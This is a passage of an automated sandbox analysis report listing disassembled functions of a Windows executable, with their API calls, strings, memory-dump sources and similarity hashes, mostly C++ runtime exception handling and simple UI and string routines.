                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                      • Opcode ID: c0b35fab3b28cc08379f738c0b6819e885caef556e0597232c6272927c57954c
                                                                                                                                                      • Instruction ID: aa41efd1d423b8a5d10240cf30fe7f6fdfe2eb4a552ee744cdd5a7d3d78d06b6
                                                                                                                                                      • Opcode Fuzzy Hash: c0b35fab3b28cc08379f738c0b6819e885caef556e0597232c6272927c57954c
                                                                                                                                                      • Instruction Fuzzy Hash: BEF09631D443149BD625BB7AA807BDD37A06F00718F12010FFC54662C2CB2C99C0DA5D
                                                                                                                                                      Function 0040D8E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • UrlEscapeW.SHLWAPI(00000000,?,?,00408B1C), ref: 0040D8FC
                                                                                                                                                      • UrlEscapeW.SHLWAPI(00000000,?,?,00003000,?,?,00003000,80070057,?,?,00408B1C), ref: 0040D975
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      • _wcsnlen.LIBCMT ref: 0040D98A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Escape$Exception@8Throw_wcsnlen
                                                                                                                                                      • String ID: pOtPJt
                                                                                                                                                      • API String ID: 3869000346-1176437184
                                                                                                                                                      • Opcode ID: 5ca6acc30a430e574c9760774463274ab4bad4654caa39c02441de65d58d91ac
                                                                                                                                                      • Instruction ID: d1cb98987559650d629e73c162e3cbdd425e347001b25a3870b1e644c1132242
                                                                                                                                                      • Opcode Fuzzy Hash: 5ca6acc30a430e574c9760774463274ab4bad4654caa39c02441de65d58d91ac
                                                                                                                                                      • Instruction Fuzzy Hash: 9E51D471A006019FE711DFB9C881B5EB7E1EF44324F14863EE491A73E0EB78A904CB54
                                                                                                                                                      Function 00404830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406810: LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040491B
                                                                                                                                                      • MessageBoxW.USER32(00000000), ref: 00404922
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DesktopLibraryLoadMessageWindow
                                                                                                                                                      • String ID: Error$core_launch_failure
                                                                                                                                                      • API String ID: 2291125156-1231388645
                                                                                                                                                      • Opcode ID: ac2b762cd6f21a1793c955fc009723a0a690ed81f3d34301eb5dcc339244b6ac
                                                                                                                                                      • Instruction ID: b6af9d4a25f12b9ad618caaa04b1bce89d1bc1c33f14e2b071967ea1dc6fa62c
                                                                                                                                                      • Opcode Fuzzy Hash: ac2b762cd6f21a1793c955fc009723a0a690ed81f3d34301eb5dcc339244b6ac
                                                                                                                                                      • Instruction Fuzzy Hash: 6841F6B16006059FD704DB68C841FAAB3B5FF89324F14C7AEE525A73D1DB38AA05CB94
                                                                                                                                                      Function 00411870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrcmpiW.KERNEL32(console,00000000,?,?,00404392,?,?,?,00000004,00000001,00403CC0,00000000,00000001), ref: 00411895
                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004118FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Xinvalid_argumentlstrcmpistd::_
                                                                                                                                                      • String ID: console$list<T> too long
                                                                                                                                                      • API String ID: 223919002-314115197
                                                                                                                                                      • Opcode ID: d78708c6e26ceb291887379b36f3f026355c379ba291dcf09bcf33e7ea10b113
                                                                                                                                                      • Instruction ID: dfc77e77174de3d0180958bea3bcf2e3a491de6f7e9e655ee83e3060e2856bce
                                                                                                                                                      • Opcode Fuzzy Hash: d78708c6e26ceb291887379b36f3f026355c379ba291dcf09bcf33e7ea10b113
                                                                                                                                                      • Instruction Fuzzy Hash: C62121317002259FC710DFA9D880AA6F3D9EF48324B05C2AAED588B351DB35EC80C7D8
                                                                                                                                                      Function 00411D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcsicoll
                                                                                                                                                      • String ID: true$yes
                                                                                                                                                      • API String ID: 3832890014-2567188892
                                                                                                                                                      • Opcode ID: 240633a689e3ec326197cc86427cabd57f99d37e8cdc38ffffa653c739971018
                                                                                                                                                      • Instruction ID: 056d6a437137f40ddd0f9b55810a2cd9cc2c27070f95a7c871400e051a22f119
                                                                                                                                                      • Opcode Fuzzy Hash: 240633a689e3ec326197cc86427cabd57f99d37e8cdc38ffffa653c739971018
                                                                                                                                                      • Instruction Fuzzy Hash: 5A21E1716406049FD710CB99DC41B9AF3A8FB85371F14836BE924833E0E739AD05CA98
                                                                                                                                                      Function 00403407 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00403426
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00403417
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040343B
                                                                                                                                                        • Part of subcall function 00403560: GetModuleFileNameW.KERNEL32(00000000,?,00000104,C6FB9493,00000000,?,00000001), ref: 004035A3
                                                                                                                                                        • Part of subcall function 00403560: _wcsrchr.LIBCMT ref: 004035B6
                                                                                                                                                        • Part of subcall function 00403560: SetCurrentDirectoryW.KERNEL32(?,?,00000001), ref: 004035CE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strCurrentDirectoryExceptionFileModuleNameRaise_wcsrchrstd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2761665094-962849395
                                                                                                                                                      • Opcode ID: 1b2f38a8a05e39e33b413d8fef802326639c188257957995a35008b92eec63ee
                                                                                                                                                      • Instruction ID: c93339cf9368618aa92baf390853cbc41d89bd29fa15fd629511ca6a49be4a75
                                                                                                                                                      • Opcode Fuzzy Hash: 1b2f38a8a05e39e33b413d8fef802326639c188257957995a35008b92eec63ee
                                                                                                                                                      • Instruction Fuzzy Hash: 3D1166B19142155BC700FFB6AC464EFB7A8AD84358F40093FF851B7181EB3C9A0886EA
                                                                                                                                                      Function 004111AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004111CD
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004111BE
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004111E2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: 41f9b13ae497cfe8640b41a49ab00bd169d6d1b31c3e9db4d8a233446f3517e7
                                                                                                                                                      • Instruction ID: 0be7496b70bc6fec9745d464b0648aa59ac1e126cae545bd80240c4e67d28df4
                                                                                                                                                      • Opcode Fuzzy Hash: 41f9b13ae497cfe8640b41a49ab00bd169d6d1b31c3e9db4d8a233446f3517e7
                                                                                                                                                      • Instruction Fuzzy Hash: 18F054F2910118AAC711EFD4A9418EFB7E89F44304B10446BF905B2141DA795F4487FA
                                                                                                                                                      Function 00404B73 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404B96
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404B83
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404BAB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: 09ac8663572faa41aee483b52a40b93fdceb60dc58fff27d6276f71200c00db7
                                                                                                                                                      • Instruction ID: aa8cd1588735c51515c65f38322514867c9c2a5ba688d37fb35725eccd3fef46
                                                                                                                                                      • Opcode Fuzzy Hash: 09ac8663572faa41aee483b52a40b93fdceb60dc58fff27d6276f71200c00db7
                                                                                                                                                      • Instruction Fuzzy Hash: 7BE0ECB5990218EADF04EFD1DC46FEDB7746F48749F50440EF5053A181D77C62888A7A
                                                                                                                                                      Function 004109C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004109EB
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004109DC
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00410A00
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: ba21db6094558bbda92e9fdb070596c334fcf61a668c5e12c5c07b178eb4eb90
                                                                                                                                                      • Instruction ID: b8b88d8bb8466062e5abec39d0c36b4c19769e7e1302a3700d13e2ed555ba46e
                                                                                                                                                      • Opcode Fuzzy Hash: ba21db6094558bbda92e9fdb070596c334fcf61a668c5e12c5c07b178eb4eb90
                                                                                                                                                      • Instruction Fuzzy Hash: 8FE01AB5950258EF8B05EF91D881CFFB7B9AFC8714B10451EF81677140CB386A09CA79
                                                                                                                                                      Function 004123C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004123E1
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004123D2
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
